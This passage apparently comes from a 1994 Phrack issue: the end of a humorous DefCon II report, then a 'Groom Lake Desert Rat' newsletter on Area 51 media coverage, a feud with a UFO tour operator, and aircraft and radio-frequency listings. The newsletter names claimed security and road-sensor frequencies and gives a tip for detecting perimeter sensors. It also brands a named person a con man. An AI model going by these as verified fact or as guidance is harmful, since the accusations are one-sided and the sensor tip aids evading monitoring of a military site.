Quarterly." I’m the technology advisor to the NCSA so it was
a natural request to which I was pleased to oblige.


I told Bob about his 15 minutes of fame at DefCon to which he
roared in laughter. "Good! Then I won’t have to subscribe
myself."

I spoke next. Jeff introduced me by saying, "Winn says he
doesn’t want to speak to an empty room so he’s gonna talk now."
Some introduction. But, what a great audience! Better than most
of the security above-ground starched sphincter tight suit and
tie conference audiences I normally get. But then again, I get
paid handsomely to address legitimate audiences where I have to
be politically correct. At DefCon, insulting people was the last
thing I worried about. It was what I focused on, onstage and
off.


"Hey, kid. Did you ever land Zimmerman in bed?"

"You, you, . . ."

"C’mon kid. Give me your best shot."

"Your mother . . ." A crowd gathered to see what kind of
repartee this little schnook could come up with. "Your mother . . ."
C’mon kid. You got it in you. C’mon. "You, she is a . . .
uh, . . . mother . . ." and he finally skulked away in sheer
embarrassment. Poor kid. When he went to the men’s room, men
walked out. Poor kid. I don’t think he ever figured out it was
all a put on.


The audience got it, though. Rather than go over what I rambled
about for an hour, here comes a blatant plug: Go buy my new book
"Information Warfare: Chaos on the Electronic Superhighway."
That’ll sum it up real nice and neat. But what a great audience.
Thanks.


Little did I know, though, that I was also on trial. 


John Markoff of the New York Times was the first to ask, and then
a couple of buddies asked and then a lady asked during the Q&A
portion of my ad hoc ad lib speech. "How come you did it?" Did
what? "How come you flamed Lenny DeCicco?"


It turns out that someone adapted my electronic identity and
logged on to the WELL in Sausalito, CA and proceeded to post a
deep flame against Lenny. Among other none-too-subtle
aspersions, ’my’ posting accused Lenny of a whole string of crimes of
Information Warfare and even out and out theft.


Except, it wasn’t me. I answered the lady’s question with, "It
wasn’t me, I don’t know Lenny and I don’t have an account on the
WELL." That satisfied everyone except for me. What happened
and why? It seems that Lenny’s former partner in crime
Most-Wanted on the lam federal fugitive computer hacker Kevin Mitnick
actually wrote and signed the letter with his initials. Or
someone was spoofing him and me at the same time. But why? And
why me?


It took a couple of days after arriving home from DefCon to learn
after extensive conversations with the WELL that my erased
account from almost two years ago and then re-erased on June 20 of
this year was accidentally turned back on by some mysterious
administrative process that I cannot claim to fathom. OK, that’s
what they said.

But perhaps most interesting of the entire Getting Spoofed
incident was a single comment that Pei Chen, sysop of the WELL said
to me while I complained about how such an awful anti-social
attack was clearly reprehensible. Oh, it’s simple, she said.
"We have no security." Whooaaaahhh! The WELL? No security? I
love it. I absolutely love it. Major service provider, no
security. Go get ’em cowboy.


The only other speaker I wanted to see was Peter Beruk, chief 
litigator for the Software Publisher’s Association. This is the 
Big Software Company sponsored organization which attempts to 
privately interdict illegal software distribution as a prelude 
for both civil and criminal prosecutions. And with this group of 
digital anarchists, no less. 


The SPA scrounges around 1600 private BBS’s to see who’s making
illicit copies of Microsoft Word or Quattro For Weanies or
Bulgarian for Bimbos or other legitimate software that the
publishers would rather receive their due income from than being
stolen.


"Which boards are you on?" 

"That would be telling." Big grin and laughs. 

"Is your BBS secure?" A challenge in the making. 

"Sure is." 

"Is that an offer to see if we can break in?" Challenge made. 
"Ahem, cough, cough." Challenge denied. 


"What name do you use on the boards?" Idiot question that
deserves an idiot answer.


"Fred." Laughs. 


"You mean you have a full time guy to download software from 
boards to see if it’s legal or not?" "Yup." 


"So, you pay people to commit felonies?" Astutely stupid
question.


"We have permission." 


"Why should we have to pay rip-off corporations too much money to 
use really shitty software?" 


"So don’t buy it."


"We don’t. It’s so shitty that it’s barely worth stealing." 


"So don’t steal it." 


"Just want to check it out, dude." 


"Scum sucking imperialists are making all of the money. The 
software designers are getting ripped off by the big software 
bureaucracies. Power to the people." Every generation goes 
through this naively innocent berating of capitalism. It doesn’t 
make them Communists (in 1950 it did), just not full fledged 
capitalist pigs themselves yet. Soon come. Vis a vis Ludwig’s 
comment on the asset-deprived audience. Soon come, man. 


"We go after BBS’s that store illegal software."

"So you’re gonna put Compuserve in jail?" Big, big applause.


Despite the openly verbal animosity between the freeware
believers and the Chief Software Cop, the spirited and entertaining
disagreements maintained a healthy good natured tone that well
exceeded Peter’s time limit, as DefCon II was coming to a close.


It was time for one more stand up comedy attempt by a short haired 
bandanna wearing hippie/hacker/phreak who was not quite up to the 
job. 


"OK, guys. We’ve had some fun at the Feds’ expense. They’re
people, too. So, from now on, it’s Hug a Fed. Go on, find a fed
and go up to him or her and give them a great big bear hug full of
love." The Feds that had been busted were gone. The ones still
successfully undercover weren’t about to blow it for a quick feel
from a horny teenager.


Next. The Cliff Stoll doll with an assortment of accessory
yo-yos was a popular item. It was thrown pell-mell into the crowds
who leapt at it with a vengeance like a baseball bleachers
section awaiting the 61st home run.


"There used to be a Wife of Cliff Stoll doll, but no one’s seen
it in two years." Cliff is strange. I don’t know if he’s that
strange, but it was a funny bit.


"Then we have the LoD/MoD action figure set starring Erik
Bloodaxe and Phiber Optik." GI Joe action set gone underground.
Corny, but appreciated as hundreds of bodies dove to catch the
plastic relics tossed from the stage.


If anything, an anti-climactic end to an otherwise highly
informative and educational conference. I can hardly wait till next
year when, after word gets out, DefCon III will be attended by
thousands of hackers and cops and narks who will try to replay
the Summer of Cyber-Love ’94 for a sequel.


* * * * *


More than anything I wanted to get away from the Sahara. Away
from its nauseatingly chromatic carpets, its hundreds of
surveillance cameras, and most of all, away from its exploding
toilets.


We decided to play, and play we did at the new Luxor Hotel which 
is an amazing pyramid with 4000+ rooms. There are no elevators as 
in a pyramid ’going up’ is kind of useless, so Inclinators take
passengers up the 30 some odd floors to hallways which ring 
around the impossibly huge hollowed out pyramid shaped atrium. 


This was play land. And for three hours we played and played and 
went to dumb shows that attract mid-western mamas from Noodnick, 
Kentucky, alighting in Vegas for their annual RV pilgrimage. But 
we went and enjoyed none the less. 


The "Live TV" show was anything but live except for lovely Susan 
who hosted us into the ersatz TV station. Her job is to look 
pretty, sound pretty and warm up the crowd for an over budget, 
overproduced schmaltz driven video projection that was to make us 
all feel like we were on stage with Dave. Letterman, that is. 
The effect does not work. But we enjoyed ourselves, anyway. 


"Everyone here on vacation?"


"No!" I yelled out. Poor Susan was stunned. No? Why else would
you be here?

"What are you doing?" The TV audience of 500 was looking our
way. Between the five of us we had a million dollars (give or
take) of electronic wizardry stuffed around us, beneath us and in
our laps.


"Working." Gee, I’m quick. 


"What do you do?" Susan asked with a straight face. I bet she
expected something like gas pumper, or nocturnal mortuary
fornicator or 7/11 clerk.


"We’re hacking for Jesus. This is Cyber Christ!" I said pointing 
at Erik Bloodaxe. 


Silence. Dead silence again. Sleep with Phil Zimmerman silence. 
Except for us. We giggled like school boys. Psyche. 


"Ah, . . . that’s nice." That was all she could come up with:
That’s nice. So much for ad libbing or deviating from the
script. But the TV audience enjoyed it. A whole lot. They
finally figured out it was put on. Not every one from the
Mid-West is as stupid as they all pretend to be.


Then it was time to get sick. VR rides do me in, but not to be 
publicly humiliated by my 20-something cohorts (and Mike Peros 
with whom I had to travel yet another 2000 miles that night) I 
jumped right into an F-14 simulator which rotated 360 degrees on 
two gimbals for an infinite variety of nauseousness. 


"Oh, shit!" I yelled as I propelled myself forward and around and
sideways with sufficient g-force to disgorge even the most
delectable meal. "Oh, shit." I had reversed the throttle and was now
spinning end over end backwards. My inner ear was getting my
stomach sick. "Oh, shit." Out of the corner of my eyes my four
pals were doubled over in laughter. Had I barfed yet and not
known it? God, I hope not. "Oh, shit." I came to a dead
standstill, the video screen showed me plummeting to earth at escape
velocity and I pushed the throttle forward as roughly as I could.
An innate survival instinct came in to play. "Oh, shit!" The
virtual aircraft carrier came into sight and after almost 2
minutes of high speed rotating revulsion, I was expected to land
this spinning F-14 on a thimble in the ocean. Right. I tried,
and damned if I didn’t make it. I have no idea how, but I got an
extra 34,000 points for a safe landing. 120 seconds. Ding.
Time’s up.


I got out of the simulator and spilled right onto the floor; one 
42 year old pile of humanity who had navigated nausea but whose 
balance was totally beyond repair. "Could anyone hear me?" I 
asked from my knees. 


"They were selling tickets." 
"Do I get my money back?" 


Onto the VR race cars. I really thought I’d throw up to the
amusement of a thousand onlookers. Hacking then phreaking then
flying and now driving. I put the pedal to the metal and
crashed. The huge video display has me tipping end over end and
the screen is shaking and the car I’m driving is shuddering
violently but my brain can’t compute it all. I’m gonna retch, I
just know it. But I keep on driving, decidedly last against
people who haven’t been handicapped with an inner ear so
sensitive I get dizzy when I watch a 5" black and white TV.


We tilted out of there and alas, it was time to find a 200,000
pound of metal to glide me home. It was a damn good thing I hadn’t
eaten before VR Land, but I wolfed down $3 hot dogs at the
airport knowing full well that whatever they served on the plane
would be a thousand times worse. So Mike and I munched, leaving
Cyber Christ and friends to battle the press and the stars at the
opening of Planet Hollywood at Caesar’s Palace.


And then an unexpected surprise. Lisa and friend, our first class
objects of flirtation from the outbound trip which seemed like a
month ago, appeared. But we were all so wiped out that a
continent of innuendo turned into a series of short cat naps. We got
a few flirts in, but nothing to write home about. Red Eye
flights are just not what they’re cracked up to be.


As I crawled into bed at something like 7AM Eastern, my wife
awoke enough to ask the perennial wife question. "What did you
do all weekend?" I, in turn, gave her the usual husbandly
response.


"Oh, nothing. Good night, Gracie." 


* * * * *


(C) 1994 Winn Schwartau 


Winn Schwartau is an information security consultant, lecturer
and, obviously, a writer. Please go buy his new book:
"Information Warfare: Chaos on the Electronic Superhighway." Available at
book stores everywhere. Winn can be reached at: Voice:
813.393.6600 or E-mail: P00506@Psilink.com

******************************************************************************


[Several of us had plans to tempt fate and join the other pop-culture
lemmings running off to Area 51 during Defcon. The not-so-secret
base has seen more press this year than Madonna. Armed with
our ICOM 2SRAs and a copy of "The Area 51 Viewer’s Guide"
we planned to put our lives on the line purely for the sake of
being able to say "We were there!"


The night before we were planning on going, FOX-TV broadcast 
an episode of "Encounters" that focused heavily on Area 51. 
The thought of tromping off on our little recon adventure 
accompanied by winnebago-loads of families taking the kids 
to see "that dang UFO place from the TV," just sorta ruined 
the mood. 


Hopefully, this won’t happen to you. And if you do go, 
you really should consider getting the "viewer’s guide" 
from Glenn Campbell (psychospy@aol.com). Email him for 
a catalog of Area 51 stuff. 


Glenn also publishes an electronic mag documenting recent activities 
surrounding Area 51, and related activities. With his permission, 
Phrack is extremely pleased to bring you the latest issue of
"The Groom Lake Desert Rat."


THE GROOM LAKE DESERT RAT. An On-Line Newsletter.
Issue #15. Sept. 2, 1994.
-----> "The Naked Truth from Open Sources." <-----
AREA 51/NELLIS RANGE/TTIR/NTS/S-4?/WEIRD STUFF/DESERT LORE
Written, published, copyrighted and totally disavowed by
psychospy@aol.com. See bottom for subscription/copyright info.

----- MEDIA COMMUNICATIONS 103A -----


SUBTLETIES OF THE TELEVISION TALK SHOW, PART I 


In DR #10, we reviewed the major news media--print, radio and 
television--and showed how each could twist reality in their own 
special way. Strictly for the sake of science, Psychospy allowed 
himself to be turned into a minor media celebrity so we could 
report to our readers the sometimes dubious processes behind the 
scenes. There was a limit, however, to how low we would sink in 
the pursuit of knowledge. We would not take off our clothes for 
the camera, and we would not place ourselves in any situation 
where our credibility, reputation or dignity could be seriously 
trashed.

Now we can report that this barrier has been broken. In the next
two issues of the Rat we will recount our first-hand experiences 
with the lowest form of mass media, the television talk show. 


..... THE MEDIUM OF TALK .....


Talk shows come in three basic formats. The rarest but most
respectable is the SERIOUS ISSUES talk show exemplified by "Meet
the Press," "Nightline" and the roundtable discussions on PBS--
maybe even "Larry King Live." They are dignified and serious,
explore meaningful political and societal issues, and hardly
anyone watches them.


The next rung down the ladder--vapid but benign--is the CELEBRITY 
CHAT talk show, like "The Tonight Show," "Late Show with David
Letterman" and "Arsenio Hall." Movie stars and Big Money authors 
pump their latest work in a non-confrontational environment 
designed only to promote laughs. 


The last and lowest form of the genre is the HUMAN CONFLICT talk 
show. These syndicated programs always bear the name of the host, 
like "Oprah," "Geraldo," "Vicky" or "Leeza." He or she is a 
charismatic and camera-loving character, no doubt ruthless in real 
life, but blessed with the ability to convey warmth and sincerity 
on TV. The fodder for these shows is a steady diet of human 
suffering, crises, angst and tragedy. Former spouses and 
estranged friends face off against each other; grown men and women 
reveal to the parents their until-now-hidden perversities, and 
human oddities of all shapes and sizes present themselves for 
humiliation before a nationwide audience. The ultimate goal of 
these shows is the public expression of private feelings. They 
seek tears, anger, jealousy and graphic self-immolation recorded 
by the camera on a tight close-up. With a dozen such shows now in 
syndication, the competition is intense to seek out new forms of 
conflict and expose the latest narcissistic trends. 


Talk shows are produced "live on tape" with minimal editing, and
this presents special problems for a guest. In other forms of
television, sound bites rule the show. It may seem artificial,
but tight editing at least assures that each party has their say
and only their finest bon mot will be used. The courteous speaker
with a few good ideas can confidently compete with any
extravagant, microphone-hogging blowhard, because most of what the
blowhard says will be cut. In the almost-live talk show, the more
reasonable speaker has to compete with the blowhard head on.
There is no time for an orderly presentation of evidence; he who
makes the most outrageous, confident and colorful claims,
groundless or not, gains the camera’s eye and controls the game.


If you have any shred of personal dignity and are asked to be a 
guest on a Human Conflict show, the best response is obvious: 
"Just Say No." Unless you are a masochist or a natural born 
actor, there is no way you can win in this format. We know it 
now; we knew it then, but sometimes, like Oedipus, you just can’t 
stop the inevitable march of Fate.... 


..... ONWARD TO HUMILIATION .....


The path to our own downfall was indirect. For several months, a 
number of journalists have been making the pilgrimage to Freedom 
Ridge, and we generally escort them as a sort of local public 
relations representative. We do not charge for this service, and 
we do not discriminate between journalists. If TASS or Penthouse 
or the Podunk Review came to call, we would treat them no 
differently than the New York Times. 


In May, we got a call from a producer from the Montel Williams
Show, one of the Human Conflict shows that we had never seen. It
seems that "Montel," as he is known to the world, had promised on
an earlier talk show that he would visit the border of Area 51.
We told the producer that we would be willing to escort Montel and
his crew to Freedom Ridge to tape a segment, but we declined an
offer to come to New York to appear on the studio show. Montel’s
visit was originally scheduled for May 5 but was canceled at the
last minute, and we breathed a sigh of relief.


In August, the project was reactivated, we suspect as the result 
of the June 22 article in the New York Times. Montel’s visit was 
scheduled for Aug. 16, and we were again asked if we would go to 
New York to appear on the later show. Again, we declined. 


When Montel came to Rachel, he brought a Humvee, his producers and 
a film crew. We went through the usual script for the camera: 
Montel drives up to our Research Center, and we meet him in the 
driveway. Inside, we show him where we are going on the map, then 
we get in the car and drive the rugged road to Freedom Ridge. We 
had done it before with countless crews, but never so quickly and 
in so few "takes." When Montel arrived, there was no question 
that he was in charge. He asked no significant questions, and 
showed no particular interest in the secret base itself. We 
sensed that he came only because he said he would and that his 
primary aim was to film a sound bite on the ridge that said, "You 
see, I did what I promised." 


As we rode down from Freedom Ridge in the Humvee with Montel and 
the producer, we were again asked if we would come to New York to 
appear on the talk show the following week, Aug. 23. We hesitated 
and were about to turn down the offer cold, when the producer 
uttered the only horrible words that could force us to comply. 


Sean David Morton. 


..... THE EMBODIMENT OF EVIL .....


We first learned of Sean Morton over two years ago, before we came
to Rachel. We had heard his enthusiastic endorsement of the Black 
Mailbox on a UFO video: 


"Probably the most amazing thing about Area 51 is the fact that
this is literally the only place in the world where you can go out
and actually see flying saucers on a timetable basis. You can
literally go out there on a Wednesday night between about seven
and one a.m. and you’ll see these things flying up and down the
valley. It’s absolutely amazing. On even a bad night you’ll have
ten, eleven, twelve sightings. On a good night--and I’ve been out
there with friends of mine camping--on a good night the sky will
just rip open with these things. You’ll see anywhere between
twenty to forty objects in a night testing over the base for
anywhere from fifteen and forty minutes at a time."


We’ve lived near the border for over a year and a half now, are 
genuinely interested in UFOs and have spent countless days and 
nights in the desert; yet we haven’t seen even ONE flying saucer, 
let alone scores. The logical explanation is that we arrived too 
late, after the saucers had been packed up and moved elsewhere. 
The trouble with this theory is that during the early part of our 
tenure, Sean Morton continued to bring tours to the area--at $99 a
head--and reported UFOs everywhere.


In one celebrated incident in March 1993, Psychospy spent the 
night on White Sides, overlooking Groom Lake, with some aviation 
watchers and a writer from Popular Science. We were looking for 
the alleged Aurora spyplane--almost as ephemeral as flying 
saucers--but we saw nothing more than a few satellites, some
distant aircraft strobes and an occasional meteor. The following
was reported in the March 1994 Popular Science....


"Last March, three chilly airplane watchers with binoculars 
atop White Sides Mountain at this magic hour [4:45am] were 
tracking a 737 airliner approaching Groom Lake, as a fourth member 
of their group thawed out in his truck below. Parked on a knoll, 
he was next to a vanload of UFO seekers. They were led by tour
operator Sean Morton, whose leaflet described him as ’the world’s 
foremost UFO researcher.’ 


"Morton donned a horned Viking helmet and from time to time 
pointed to the sky, exclaiming: ’Look at that one!’ The airplane 
watcher trained his binoculars in the same direction but saw 
nothing out of the ordinary. Later, Morton’s group became excited 
by what they perceived as an entire formation of UFOs; the 
airplane watcher’s lenses revealed only stars. Finally, as the 
morning’s first 737 made its gentle approach toward Groom Lake at 
4:45, the UFO enthusiasts rejoiced at Old Faithful’s appearance. 
Everyone had seen exactly what they hoped for." 


In the beginning, when we were new to the area, we were generous 
to Sean and called him "fantasy prone." As we got to know him 
better and gained confidence in our own knowledge base, we came to 
mince no words. Sean is a deliberate con man. He recognizes as 
well as us the landing lights of a 737, but he knows that others 
can be fooled and taken for a $99 ride to see them. If anyone is 
spreading disinformation about Area 51, filling the air with noise 
to make the truth harder to grasp, it isn’t sinister government 
agents; it’s Sean David Morton pursuing only his own greed and 
self-aggrandizement. 


We have worked hard over the past 18 months to undo the damage 
Sean has done and displace him from the Area 51 scene. 
Discrediting Sean isn’t complicated: We simply quote his own 
words whenever we can. Sean is a broadly diversified charlatan, a 
self-proclaimed expert in faith healing, earthquake prediction, 
psychic prophesy and virtually every other New Age fad. We have 
no problem at all with him plying his trade within the confines of 
the state of California where he justly belongs, but when he 
proclaims himself the foremost authority on Area 51, we get 
territorial. We hope that our "Area 51 Viewers Guide" has reduced 
the gullibility of newcomers and made the environment less 
attractive for leeches like him. In fact, we haven’t had a
confirmed Morton sighting near the border in over a year. We
heard from sources in California that he no longer gave tours to
Area 51 because the saucers had been moved elsewhere, which was
fine by us.


The saucers must have returned, however. As the recent Groom Lake 
publicity reached its peak, "The World’s Foremost UFO Researcher" 
could not help but resurface to suck energy from it. In recent 
months, reports began to reach us that he had appeared as an Area 
51 expert at UFO conferences, on radio talk shows and on the 
Montel Williams Show. 


In the latter appearance, which was first broadcast in December
1993, Sean showed video footage of nighttime "UFOs" that he said
he photographed "at great risk to my own life." As we viewed them
later, one clip showed an isolated circle of light jumping around
within the frame. It could have been any stationary out-of-focus
light shot through a hand-held video camera. Notches seen on the
top and bottom of the "disk" correspond to protrusions inside the
lens assembly. In the other clip, only slightly out of focus, we
saw the lights of a 737 landing on the Groom Lake airstrip. To
Sean, it was "an object actually coming in from space." The time
stamp in the corner said "4:49 am."


It was on this show that Montel promised to visit Area 51 escorted 
by Sean; yet when Montel finally made the trip eight months later,
Sean was not invited. The producer told us that word had reached 
him from many sources that Sean was considered a fraud, that in 
addition to UFOs he also did psychic prophesies and that his 
claimed credentials were highly dubious. He and Montel felt that 
Sean had taken advantage of them and that by having him on the 
show they had inadvertently legitimized him. 


But none of that prevented them from inviting him back as a guest
on the second studio show.


As we rode down in the Humvee from Freedom Ridge with Montel and 
the producer, the reality to us became crystal clear: If we did 
not appear on the Montel Williams Show, then Sean would have the 
stage all to himself and could continue to spread any sort of 
nonsense about Area 51. We felt that we had no choice. Either we 
did battle with this guy now, before he grew bigger, or we would 
be cleaning up his mess for many months to come. 


----- OUR RAPID EDUCATION -----


We had less than a week to prepare for the big show--nowhere near 
enough time to do all the research we needed. The first item of 
business was to actually watch the Montel Williams Show and 
familiarize ourselves with the format. We cranked up our 
satellite dish and surfed through the channels. On "Donahue":
"Six Year Olds Who Sexually Harass Other Six Year Olds." On
"Rolanda," a related topic: "Will Your Child Grow Up To Be A
Serial Killer?" On "The Vicky Show," we heard that Sean Morton 
had just appeared as an expert on the prophesies of Nostradamus, 
but we were unable to catch that one. 


The first Montel Williams Show we saw was, "Mistresses Who Want To 
End The Affair." On the stage, three women disguised by dark
sunglasses explained why they had been attracted to married men. 
We could only tolerate about ten seconds at a time of this show, 
but when we tuned back, we found that the women had shed their 
sunglasses and revealed their true identities. Presumably, they 
had also revealed, or at least seriously compromised, the 
identities of the men they had been having the affairs with. When 
we tuned in again later, one of the three was having an angry 
argument with a fourth female guest. We guessed that this was the 
wife of one of the married men. 


A friend sent us a tape of Montel’s original UFO show in which 
Sean appeared as a "UFO Investigator" and Montel promised to 
visit. The show included an abductee, a witness to the "Kecksburg 
Incident," a former actress, WFUFOR Sean David Morton, a requisite 
skeptic, a pro-UFO filmmaker and--as if you hadn’t guessed--that 
talk show regular Travis Walton. The show was conducted in the 
"expanding chairs" format. It started out with two guests alone 
on the stage, then more guests and chairs were added during each 
commercial break until there were seven chairs and seven 
squabbling speakers vying for attention on the platform. In this 
format, attention is diluted with each new chair, so the people 
who appear last, typically the skeptics, usually get only a few 
seconds of airtime. During the free-for-all of a seven-person 
debate, the camera always focuses on the most aggressive and 
charismatic guest--i.e. Sean David Morton. 


The last chair to be filled was occupied by filmmaker Russ Estes, 
who the on-screen caption said, "Does Not Believe In UFOs." This 
is false. He is a disciplined UFO investigator who has devoted 
his career to making films on the subject, as well as exposing 
obvious frauds. What is true is that he "Does Not Believe In Sean 
Morton." In his few seconds of air time, he raised doubts about 
one of Morton’s many fake credentials, his claimed "Doctor of 
Divinity" degree. 

RUSS ESTES: "You know, [...] and this is what I’ve [...] is the
quality of the individual who is bringing me [...] message [...]
the-boy-that-cried-wolf syndrome is phenomenal in this field. You
get people out there who are saying, I’m this, I’m that, and I
hate to do this to you, Sean, but here’s a guy right here who
claims to be the Doctor, Reverend Sean David Morton. In his own
biography, he claims to have gotten his Doctor of Divinity
at--excuse me, it will take me one second...."

SEAN MORTON: "Berachah University." 

RUSS ESTES: "Berachah University, Houston, Texas--the Berachah
Church. I called them. They don’t have any type of degrees that
they give. They have Bible study at the best. He claims to have
attended University of Southern California...."

MONTEL WILLIAMS: "So the point that you are making, Russ, is that 
there’s a problem with the messenger, so therefore the message is 
not real." 

RUSS ESTES: "How can you believe the message if the people lie to
you from the start."

SEAN MORTON: "The thing I’d like to point out about Mr. Estes
here is that if you don’t like the message, you can shoot the
messenger, and it’s obvious to me that in the UFO field, we do
this for free, we do this because we want to know the truth,
because we have seen something...."

RUSS ESTES: "But does that mean you bogey up your credentials?"

SEAN MORTON (angry): "That is not true. You are flat-out lying
to these people. I went to USC for four years."


Just then, the debate was cut off by a sloppy edit, and Sean’s USC
diploma appeared on the screen.


After watching the tape, we contacted Russ Estes. He said that
the debate between him and Sean went on much longer than was shown
on the screen. "Live on tape" does not mean totally unedited.
This show went on for over two hours to obtain one hour’s worth
of material. Sometimes, whole shows are thrown out when they
don’t work. Unfortunately, Estes made a misstep on the USC
degree. As it turns out, this is just about the only authentic
credential Sean has: a B.A. in Drama and Political Science. We
certainly believe the Drama part: It’s the last degree he ever
needed.

The Doctor of Divinity degree is still phony, but in the talk show
world, evidence counts for nothing; only emotions and presentation
matter. Sean walked away from the show as a brave and
knowledgeable crusader, legitimized by a promise from Montel to
take his tour, and with the implied invitation to reappear on the
show. Estes walked away alone, wasn’t invited to return, and has
since had to live down the "Does Not Believe in UFOs" moniker.
Sean even had the delightful gall to send Estes a letter, through
the producers...


Mr. Russ Estes 

c/o Alex Williams [sic] 
The Montel Williams Show 
1500 Broadway Suite 700 
New York, New York, 10036 

Dear Russ:

I am going to assume that you are not a bold faced liar who is out
for some kind of warped revenge, or a person who is just trying to
make a buck off baseless slander.


Let’s try to solve this like gentlemen. Enclosed is a copy of my
U.S.C. diploma. I have also called the school and my records are 
intact. The rest of your "research" on me is equally faulty. 


I hope this solves out problem. If not, I have consulted my 
attorney and any further slander directed toward me through your 
video series or elsewhere, will result in action taken against 
you. 


Yours Truly, 
[BIG signature] 
Sean Morton 


Things were beginning to look grim for Psychospy. With the time 
of the taping drawing near, we hadn’t even begun to scratch the 
surface of Sean David Morton and his path of destruction. Talking 
to our contacts, we saw that Sean had accumulated a vast audience 
of intimate enemies, more than we could possibly contact. If Sean 
sounds knowledgeable and occasionally has some meaningful 
information, it is because he has ripped it off from others. We 
were amused to find that there was even a reputable astrologer
who hated Sean, who felt that Sean had stolen his predictions and 
passed them off as his own. 


It seemed a futile exercise anyway. We knew all the evidence in 
the world wasn’t going to matter when we actually faced off 
against Sean on camera. We were leaving behind our own 
comfortable medium of logic and data and stepping into his home 
turf--the talk show--where presentation counts more than content. 


We were obligated by our own ethics to speak only the simplest 
truths and the cautious assertions supported by data. Sean David 
Morton, bold faced liar that he is, faced no such constraints. He
could spout any lie he wanted to sound important and get himself
off the hook, and the only thing that mattered here was that he
said it with apparent sincerity and that it held up for
television’s thirty second attention span. We knew that if we
started to make an accusation about him, he would instantly sense
the winds and make the same one against us with greater force.
The ensuing argument would make him and us appear to be equals.


Sean knew all the buzzwords and cliches of the UFO movement and 
could spout the conventional wisdom much faster than we could. He 
knew how to sound sincere and reasonable and adapt instantly to 
the sentiments of any social circumstance. He was well-practiced 
at responding to inquisitions and had emerged from many without a 
scratch. Opposing him, all we had was a body of mundane knowledge 
about a very limited area of the desert. Sean was smooth and 
well-honed in his talk show delivery, and we were stumbling in for 
the first time to a medium where we really didn’t want to be. 


It was with these reservations and a sense of dark foreboding that 
we packed our bags and headed for New York City. There, in Times 
Square, we expected a titanic battle between Good and Evil, and
things didn’t look good for Good. 


[To be continued in Desert Rat #16....] 


----- NEW AIR FORCE STATEMENT ON GROOM -----


The following statement was recently released to inquiring 
journalists by the Nellis AFB public affairs office. (We
requested our own copy from Major George Sillia on Aug. 26.) It 
represents a significant shift from the previous "We know nothing 
about Groom Lake" response. 


"There are a variety of facilities throughout the Nellis Range 
Complex. We do have facilities within the complex near the dry 
lake bed of Groom Lake. The facilities of the Nellis Range 
Complex are used for testing and training technologies, 
operations, and systems critical to the effectiveness of U.S.
military forces. Specific activities conducted at Nellis cannot 
be discussed any further than that." 


That’s a step in the right direction. What the base needs now is 
a name and a history. For example, tell us about the U-2 and A-12 
programs at Groom in the 1950s and 1960s. That’s not very secret 
or critical to our current defense, so what’s the point in 
pretending it is? Will the Air Force take control of the 
situation and provide this information itself, or will the void be 
filled by a dozen aggressive entrepreneurs?


We’d bet our money on the entrepreneurs. 


----- EG&G TO ABANDON TEST SITE -----


According to an 8/26 article in the Las Vegas Review-Journal, EG&G 
and its REECo subsidiary will not seek renewal of their Nevada 
Test Site contract when it expires in 1995. These are two of the 
three companies that have managed the nuclear testing ground since 
its inception. It is unclear whether this action will have any 
effect on operations at the adjoining Groom Lake base, where EG&G
and REECo are also assumed to be major contractors. 


Recent rumors say that EG&G no longer operates the "Janet" 737 
jets that shuttle workers to Groom and Tonopah. That operation 
has supposedly been taken over by the Air Force, using the same 
aircraft and possibly the same staff. 


----- JANET "N" NUMBERS ----- 


For aircraft watchers, here are the registration and serial
numbers of Janet 737s and Gulfstream commuter planes spotted at
the Janet terminal at McCarran airport. Based on observations in
5/94 and the 4/30/94 FAA registry. One or more of the Janet
aircraft are probably missing from this list. (We ask our readers
to find them.)


Boeing 737...

Reg. #/Serial #/Owner
N4508W 19605 Great Western Capital Corp, Beverly Hills
N4510W 19607 Great Western Capital Corp, Beverly Hills
N4515W 19612 Great Western Capital Corp, Beverly Hills
N4529W 20785 First Security Bank of Utah, Salt Lake City
N5175U 20689 Dept. of the Air Force, Clearfield UT
N5176Y 20692 Dept. of the Air Force, Clearfield UT
N5177C 20693 Dept. of the Air Force, Clearfield


Gulfstream C-12...

N20RA  UB-42 Dept. of the Air Force, Clearfield UT
N654BA BL-54 Dept. of the Air Force, Clearfield UT
N661BA BL-61 Dept. of the Air Force, Clearfield UT
N662BA BL-62 Dept. of the Air Force, Clearfield UT


----- JANET HANDOFF FREQUENCIES -----


A DESERT RAT EXCLUSIVE! Published here for the first time are the 
air traffic control frequencies for the "Janet" 737 crew flights 
from Las Vegas McCarran Airport to Groom. The McCarran freqs are 
public, but the Groom ones have not been revealed until now. Air
traffic control broadcasts are "in the clear" and any scanner 
radio should be able to pick them up. Each of these freqs has 
been personally confirmed by Psychospy or a close associate. 


121.9 McCarran Ground Control
119.9 McCarran Tower
133.95 Departure Control
119.35 Nellis Control
120.35 Groom Approach
127.65 Groom Tower
118.45 Groom Ground


Here are some other Groom freqs (some of which were previously
reported in DR #8). The security frequencies are usually 
scrambled, but not always. 


418.05 Cammo Dudes (primary)
408.4 Cammo Dudes (repeat of 418.05)
142.2 Cammo Dudes
170.5 Cammo Dudes (Channel 3)
133-23 "Adjustment Net" (seems related to security)
261.1 Dreamland Control (published)
2 59659 Groom Tower (repeat of 127.65)
154.86 Lincoln County Sheriff
496.25 Road sensors on public land
410.8 Pager (apparently from Groom but unconfirmed)


The most accurate way to detect a road sensor (AFTER you have 
tripped it), is to program 496.25 into several channels of your 
scanner, then scan those channels exclusively as you are driving. 
When the scanner stops on one channel, you have just passed a 
sensor. 


----- GROOMSTOCK '94 -----


The "Freedom Ridge Free Speech Encampment" went pretty much as 
planned, with at least sixty people in attendance but not all of 
them staying for the night. There were no surprises and, sadly, 
no confrontations with the authorities when we whipped out our 
cameras and pseudo-cameras to point at the secret base. The Cammo 
Dudes were visible but kept their distance, and the only authority 
figure to show up on the ridge was a BLM Ranger in a Smoky-the- 
Bear hat. He was concerned only that we clean up our trash, and 
he warned us, by his very presence, that "Only You Can Prevent 
Forest Fires." 


The event was recorded in an 8/29 article in the Las Vegas Review- 
Journal, which dubbed it "Groomstock." [The article may be 
available at the FTP site.] We were disturbed to read in the 
paper that the attendees included some "marijuana-smoking 
slackers." We called around and found out it was true and that it 
happened after Psychospy went to bed. Had we known, we would have 
quashed it immediately. This sort of thing discredits our ability 
to police ourselves and hurts the reputation of the land grab 
opponents. 


The hot gossip around the campfire was about the Review-Journal 
reporter and the loony in the tie-dyed shirt. The loony had spent 
about an hour moving rocks and dirt around to make himself a 
comfortable bed, then he blew a conch-shell horn and banged cymbals
together to bless it. When the reporter arrived, he volunteered 
to make a bed for her, too, not far from his own, and he proceeded 
